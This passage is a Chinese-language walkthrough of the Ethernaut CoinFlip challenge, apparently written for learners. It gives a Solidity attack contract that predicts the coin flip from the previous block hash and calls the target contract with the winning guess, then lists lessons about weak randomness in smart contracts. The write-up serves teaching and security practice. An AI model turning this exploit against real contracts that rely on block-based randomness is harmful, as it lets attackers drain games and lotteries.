請注意,在我們的Ethernaut練習中,n = 2代表硬幣翻轉的兩面。
這種在智慧合約中匯出偽隨機性的方法很容容易受到攻擊。如果知道輸入的駭客可以結此猜出“隨機”結果。
這就是解決CoinFlip級別的關鍵。 在這裡,確定硬幣翻轉的輸入變數對於您來說是公開的。
詳情演練
我們來建立一個惡意智慧合約,檢查硬幣翻轉的結果。
只有當你正確猜到了結果時,你才能呼叫真實合約的翻轉(bool _guess)函式。
1、在Remix IDE中,建立一個與CoinFlip.sol相關的惡意合同:
contract hackCoinFlip {
CoinFlip public originalContract = CoinFlip(
"your instance address");
uint256 FACTOR = 578960446186580977117854925043439539266349923
32820282019728792003956564819968;
function hackFlip(bool _guess) public {
//TODO
}
}
2、實現hackFlip()函式,使用與原始智慧合約相同的邏輯和輸入變數來預測翻轉結果。 既然你知道blockhash和block.number,那麼你就能準確預測正確的_guess。
function hackFlip(bool _guess) public {
// pre-deteremine the flip outcome
uint256 blockValue = uint256(block.blockhash(block.number-1));
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
// If I guessed correctly, submit my guess
if (side == _guess) {
originalContract.flip(_guess);
} else {
// If I guess incorrectly, submit the opposite
originalContract.flip(!_guess);
}
}
3、呼叫你的hackFlip()函式10次。當您做出正確的猜測時,原始智慧合約的consecutiveWins計數器應該逐步增加。
關鍵安全要點
1. 沒有真的隨機性。
2. 在計算智慧合約中的“隨機性”時(或者甚至從現有的隨機數庫繼承)時要格外注意。 如果您使用隨機性來確定比賽獲勝者,請記住,對手可以輕鬆猜出隨機結果並破解您的遊戲!
